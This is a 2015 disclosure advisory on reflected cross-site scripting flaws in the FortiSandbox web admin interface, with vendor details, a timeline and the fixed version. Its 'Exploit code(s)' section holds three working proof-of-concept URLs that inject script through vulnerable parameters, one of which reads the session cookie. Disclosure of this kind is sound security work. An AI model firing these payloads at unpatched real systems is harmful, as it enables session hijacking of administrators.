FortiSandbox 3000D 2.02 build0042 Cross Site Scripting

`[+] Credits: John Page aka hyp3rlinx  
  
[+] Website: hyp3rlinx.altervista.org  
  
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FORTISANDBOX-0801.txt  
  
  
Vendor:  
================================  
www.fortinet.com  
PSIRT ID: 1418018  
  
  
  
Product:  
==================================  
FortiSandbox 3000D v2.02 build0042  
  
  
Vulnerability Type:  
===================  
XSS  
  
  
  
CVE Reference:  
==============  
Pending  
  
  
  
Advisory Information:  
===========================================================================  
Multiple XSS vulnerabilities in FortiSandbox WebUI  
  
Impact  
  
A remote unauthenticated attacker may be able to execute arbitrary code in  
the security context of an authenticated user's browser session.  
  
Affected Products  
  
FortiSandbox 2.0.4 and lower.  
Solutions  
  
Upgrade to FortiSandbox 2.1 or above.  
  
  
  
Vulnerability Details:  
====================================================================  
http://www.fortiguard.com/advisory/FG-IR-15-019/  
http://www.fortiguard.com/advisory/2015-07-24-multiple-xss-vulnerabilities-in-fortisandbox-webui  
  
The Web User Interface of FortiSandbox version 2.0.4 and below is  
vulnerable to multiple reflected Cross-Site Scripting vulnerabilities.  
  
5 potential XSS vectors were identified:  
  
* Fortiview threats by users search filtered by serial  
* Fortiview threats by users search filtered by vdom  
* Export report feature in the Fortiview search page  
* Screenshot download generated by the VM scan feature  
* PCAP file download generated by the VM scan feature  
  
  
  
Exploit code(s):  
===============  
  
1)  
https://localhost/alerts/summary/profile/?prof_type=byusers-profile&from=byusers-filter&username=10.10.10.10&serial=<script>alert(666)</script><script>alert('XSS by hyp3rlinx 06012015')</script>&vdom=&from_time_period=1440#frag-1  
  
vulnerable parameter: "serial"  
------------------------------  
  
2)  
https://localhost/csearch/report/export/?urlForCreatingReport=<script>alert(666)</script><script>alert('XSS by hyp3rlinx June 1, 2015')</script>  
  
vulnerable parameter: "urlForCreatingReport"  
--------------------------------------------  
  
3)  
https://localhost/analysis/detail/download/screenshot?id="/><script>alert('XSS by hyp3rlinx June 1, 2015 '%2bdocument.cookie)</script>  
  
vulnerable parameter: "id"  
--------------------------  
  
  
  
Disclosure Timeline:  
========================================  
Vendor Notification: June 1, 2015  
Vendor Disclosure: July 24, 2015  
August 1, 2015 : Public Disclosure  
  
Fixed In Firmware 2.1  
  
  
  
Discovery Status:  
=================  
Published  
  
  
  
Exploitation Technique:  
=======================  
Remote unauthenticated  
  
  
  
Severity Level:  
===============  
Medium  
  
  
  
Description:  
=====================================================================  
  
  
Request Method(s): [+] GET  
  
  
Vulnerable Product: [+] FortiSandbox 3000D v2.02  
  
  
Vulnerable Parameter(s): [+] serial, urlForCreatingReport, id  
  
  
Affected Area(s): [+] FortiSandbox Web Admin UI  
  
  
=====================================================================  
  
[+] Disclaimer  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.  
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.  
  
by hyp3rlinx`